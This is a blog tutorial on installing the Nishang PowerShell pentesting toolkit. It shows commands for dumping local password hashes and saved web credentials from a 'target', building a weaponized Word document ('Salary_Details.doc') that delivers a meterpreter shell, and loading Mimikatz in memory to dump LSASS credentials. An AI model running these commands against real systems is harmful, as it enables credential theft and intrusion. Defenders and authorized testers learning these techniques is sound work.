Skip to content

Hacking In Windows Using Nishang With Windows PowerShell, Like A Boss!

As requested, this is the first post of many I’m doing on “hacking” and “pentesting.”  Many admins aren’t comfortable with Linux, or just want to use convenient Windows-based tools, so that’s what we’re going to do.  We’ll talk about a tool called Nishang, which you can use to do many different pentesting and security auditing techniques, using the Windows PowerShell 3.0.

To get started, you will need to download Nishang.  You can click here to go directly to the GibHub page or click the link below to download the latest version directly.  First, here’s a video the creator of Nishang gave at Defcon 21.

 

Download & Install

 

Click here to download the latest version of Nishang from GibHub (master.zip).

 

Once you’ve downloaded the zip file, extract it, rename the folder to nishang.ps and put it in the root of your c: drive.

 

snag-11-4-2016-3-52-07-pm

 

Open the Windows PowerShell command prompt as Administrator.  On Windows 10, click the start button and type “powershell” then right click and select “Run as Administrator.”

 

Quick Tip:  PowerShell 3.0 is installed by default on Windows 10. If you are running an older version of Windows, click here to find out how to download and install PowerShell 3.0.  If you have an older version of Windows, like Windows 7, you will need to do a Shift + Right-Click to get the option to Run as Administrator.

 

After you’re at the bright blue command prompt, navigate to the nishang.ps folder on the root of your c: drive.

 

cd ../..

cd .\nishang.ps\

 

Next, we will run a few commands to allow the Nishang PowerShell scripts to run.  Here is a brief rundown of what we’re doing.

  • Set-ExecutionPolicy Unrestricted – Allows unsigned scripts to be executed
  • Get-ChildItem -Path ‘C:\nishang.ps\’ | Unblock-Files – Unblocks all of the PowerShell scripts within the nishang.ps folder
  • Import-Module .\nishang.psm1 – Imports all of the Nishang scripts / modules for use in PowerShell

 

Note:  Select “A” for Yes to All when prompted, after setting the execution policy in the first command.

Set-ExecutionPolicy Unrestricted

Get-ChildItem -Path 'C:\nishang.ps\' | Unblock-Files

Import-Module .\nishang.psm1

 

This is what it should look like in your window so far.

 

snag-11-4-2016-5-00-11-pm

 

To see a list of all Nishang modules now available via the Powershell, use Get-Command.

 

Get-Command -Module nishang

 

There are quite a few, as you can see.  Click here to see an image of the output.

 

PS C:\nishang.ps> Get-Command -Module nishang

CommandType Name Version Source
----------- ---- ------- ------
Function Add-Exfiltration 0.0 nishang
Function Add-Persistence 0.0 nishang
Function Add-RegBackdoor 0.0 nishang
Function Add-ScrnSaveBackdoor 0.0 nishang
Function Base64ToString 0.0 nishang
Function Check-VM 0.0 nishang
Function Copy-VSS 0.0 nishang
Function Create-MultipleSessions 0.0 nishang
Function DNS_TXT_Pwnage 0.0 nishang
Function Do-Exfiltration 0.0 nishang
Function Download 0.0 nishang
Function Download_Execute 0.0 nishang
Function Download-Execute-PS 0.0 nishang
Function Enable-DuplicateToken 0.0 nishang
Function Execute-Command-MSSQL 0.0 nishang
Function Execute-DNSTXT-Code 0.0 nishang
Function Execute-OnTime 0.0 nishang
Function ExetoText 0.0 nishang
Function FireBuster 0.0 nishang
Function FireListener 0.0 nishang
Function Get-Information 0.0 nishang
Function Get-LsaSecret 0.0 nishang
Function Get-PassHashes 0.0 nishang
Function Get-PassHints 0.0 nishang
Function Get-Unconstrained 0.0 nishang
Function Get-WebCredentials 0.0 nishang
Function Get-Wlan-Keys 0.0 nishang
Function Get-WmiShellOutput 0.0 nishang
Function Gupt-Backdoor 0.0 nishang
Function HTTP-Backdoor 0.0 nishang
Function Invoke-ADSBackdoor 0.0 nishang
Function Invoke-BruteForce 0.0 nishang
Function Invoke-CredentialsPhish 0.0 nishang
Function Invoke-Decode 0.0 nishang
Function Invoke-Encode 0.0 nishang
Function Invoke-Interceptor 0.0 nishang
Function Invoke-JSRatRegsvr 0.0 nishang
Function Invoke-JSRatRundll 0.0 nishang
Function Invoke-Mimikatz 0.0 nishang
Function Invoke-MimikatzWDigestDowngrade 0.0 nishang
Function Invoke-Mimikittenz 0.0 nishang
Function Invoke-NetworkRelay 0.0 nishang
Function Invoke-PortScan 0.0 nishang
Function Invoke-PoshRatHttp 0.0 nishang
Function Invoke-PoshRatHttps 0.0 nishang
Function Invoke-PowerShellIcmp 0.0 nishang
Function Invoke-PowerShellTcp 0.0 nishang
Function Invoke-PowerShellUdp 0.0 nishang
Function Invoke-PowerShellWmi 0.0 nishang
Function Invoke-Prasadhak 0.0 nishang
Function Invoke-PSGcat 0.0 nishang
Function Invoke-PsGcatAgent 0.0 nishang
Function Invoke-PsUACme 0.0 nishang
Function Out-CHM 0.0 nishang
Function Out-DnsTxt 0.0 nishang
Function Out-Excel 0.0 nishang
Function Out-HTA 0.0 nishang
Function Out-Java 0.0 nishang
Function Out-JS 0.0 nishang
Function Out-RundllCommand 0.0 nishang
Function Out-SCF 0.0 nishang
Function Out-SCT 0.0 nishang
Function Out-Shortcut 0.0 nishang
Function Out-WebQuery 0.0 nishang
Function Out-Word 0.0 nishang
Function Parse_Keys 0.0 nishang
Function Remove-Persistence 0.0 nishang
Function Remove-PoshRat 0.0 nishang
Function Remove-Update 0.0 nishang
Function Run-EXEonRemote 0.0 nishang
Function Show-TargetScreen 0.0 nishang
Function Speak 0.0 nishang
Function Start-CaptureServer 0.0 nishang
Function StringtoBase64 0.0 nishang
Function TexttoEXE 0.0 nishang

 

Nishang Basics

An entire book could easily be written on the various modules included with Nishang.  You can run a script locally to get an idea of what it’s capable of.  For instance, let’s start with the Get-Information command.  From the PowerShell, go ahead and run it.

 

Get-Information

 

As you can see, there is an incredible amount of information this module harvests for the attacker.  How much will be extracted from the target machine depends on the operating system and what patches have been installed.  Pen-Testing is an art and it requires a great deal of trial and error.

 

To get more specific information, such as password hashes, you can use the Get-PassHashes command.  This will dump all of the local account password hashes.  You can run it on your machine to get an idea of what it makes available.  When executed against a target machine it will provide their password hashes.

 

Get-PassHashes

 

Here is a screenshot of this command being ran against a Windows 10 workstation with the latest patches installed. The hashes are partially covered for obvious reasons.

 

snag-11-4-2016-5-44-29-pm

 

Another very useful command is Get-WebCredentials.  When this is executed against a target it will dump any saved usernames and passwords used for websites.

 

Get-WebCredentials

 

Here is the output of Get-Credentials ran against a target machine.  Identifiable information has been rendered useless, once again, for obvious reasons.

 

snag-11-4-2016-6-07-18-pm

 

As you can see, one of the dumped passwords was from paypal.com.  That’s a pretty catastrophic security issue.  A majority of people have a bank account tied to their paypal account, and at least a credit card.  Not good!

 

Advanced Usage

 

Weaponized Word Document

With Nishang’s Out-Word command, you can embed a payload in a weaponized Microsoft Word .doc file that is instructed to download and execute a powershell meterpreter.  This is an example of a command to do precisely this. It will create a Word document called “Salary_Details.doc” with the payload embedded.

 

Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'

 

snag-11-4-2016-6-35-11-pm

 

As soon as the target opens the Word document and clicks Enable Editing, the payload is delivered and you have owned their machine..

 

meterpreter_word_doc

 

The attacker now has a command line dropped to the target’s machine.  All from a single word document.

 

Nishang Help Files

 

Every command included with Nishang includes a PowerShell help file.  This is incredibly useful.  I suggest running the help command against every included command as there is a wealth of useful information.  Included is a description, synopsis, available parameters, syntax, notes, and website links with additional information.

To get help with a particular command, use the Get-Help command.  In this example, we will read the help file on the Invoke-Mimikatz command.

 

Get-Help Invoke-Mimikatz

 

As you can see, there is quite a bit of useful information provided.

 

PS C:\> Get-Help Invoke-Mimikatz -full

Do you want to run Update-Help?
The Update-Help cmdlet downloads the most current Help files for Windows PowerShell modules, and installs them on your
computer. For more information about the Update-Help cmdlet, see http://go.microsoft.com/fwlink/?LinkId=210614.
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"):

NAME
Invoke-Mimikatz

SYNOPSIS
This script loads Mimikatz completely in memory.
SYNTAX
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCreds]] [<CommonParameters>]

Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCerts]] [<CommonParameters>]

Invoke-Mimikatz [[-ComputerName] <String[]>] [[-Command] <String>] [<CommonParameters>]
DESCRIPTION
This script leverages Mimikatz 2.1 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in
memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.

This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell
v2 or higher installed.

Reflectively loads Mimikatz 2.1 in memory using PowerShell. Can be used to dump credentials without writing
anything to disk. Can be used for any
functionality provided with Mimikatz.

The script, in near future, will provide additional commands for a variety of attacks possible with Mimikatz.

Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: [email protected]
Twitter @gentilkiwi
License: http://creativecommons.org/licenses/by/3.0/fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Mimikatz version: 2.1 alpha (17/02/2016)
PARAMETERS
-ComputerName <String[]>
Optional, an array of computernames to run the script on.

Required? false
Position? 1
Default value
Accept pipeline input? false
Accept wildcard characters? false

-DumpCreds [<SwitchParameter>]
Switch: Use mimikatz to dump credentials out of LSASS.

......
....
...
..
.

 

Troubleshooting

 

If you get Permission Denied errors when attempting to install Nashing scripts, then you have not opened an “Administrative” PowerShell command prompt.  This is done by right-clicking the PowerShell shortcut and selecting “Run as Administrator.”  On some older versions of Windows, such as Windows 7, you have to hold down Shift + Right click to get the option to run as administrator.

 

Conclusion

 

This guide has taken you through the process of installing Nishang’s PowerShell module and has provided you with some examples of how to use a few of the available tools.  There are countless way this toolkit can be used and this is really just the tip of the iceberg.  I will be publishing additional resources to help guide you through using some more available tools in a more in-depth manner.  But for now, play around with the available commands and see what’s possible.  I have included some links with additional resources below.  I implore you to check them out and use google to find usage examples others have provided.  I hope you’ve found this guide helpful and if you have any questions, please feel free to post in the comments below!

 

Additional Resources

 

Nishang Tookit Homepage – High level overview of modules

https://github.com/samratashok/nishang

 

Nikhil SamratAshok Mittal’s Blog (Author of Nishang, hundreds of examples)

http://www.labofapenetrationtester.com/